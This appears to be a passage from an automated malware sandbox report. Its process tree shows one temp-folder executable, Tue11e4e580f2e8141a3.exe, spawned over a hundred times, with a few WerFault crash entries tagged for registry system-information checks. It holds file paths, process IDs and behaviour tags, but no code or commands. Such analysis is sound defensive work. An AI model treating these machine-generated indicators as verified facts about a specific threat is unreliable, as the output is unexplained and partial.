      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3480
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3952
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1724
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5536
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1880
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1580
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2012
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3276
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:936
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2844
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1528
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5028
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3220
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2056
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3300
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3484
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:240
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2268
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1812
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4940
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1968
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:232
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5216
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1020
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1020 -s 28
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:3060
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2636
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4676
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5904
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4668
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:236
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3008
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5892
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3524
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3416
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4132
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4636
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2536
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5664
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3676
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:556
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3708
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5376
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6068
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4032
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5172
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5104
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5292
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3828
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2240
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1456
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5168
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2472
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6096
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1200
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3352
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5012
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5472
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2784
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2784 -s 28
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:4076
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1240
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2592
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3544
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5320
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3244
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5764
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4132
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:940
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3628
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2888
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4480
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6080
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5552
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:552
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4336
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5404
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3436
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1244
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5228
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3464
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5476
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5476 -s 28
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:1064
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2148
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:876
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:500
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5420
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4728
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1064
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5996
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5156
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2952
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3656
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5748
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:680
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5936
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:556
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:768
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5432
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1796
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5324
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5232
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2236
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1336
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1260
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1308
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2964
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6236
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6320
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6424
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6508
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6596
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6684
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6772
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6864
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6956
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7036
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7060
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6152
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6268
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6296
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6344
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6464
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6544
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6800
      - C:\Users\Admin\AppData\Local\Temp\7zS4F38F8E3\Tue11e4e580f2e8141a3.exe
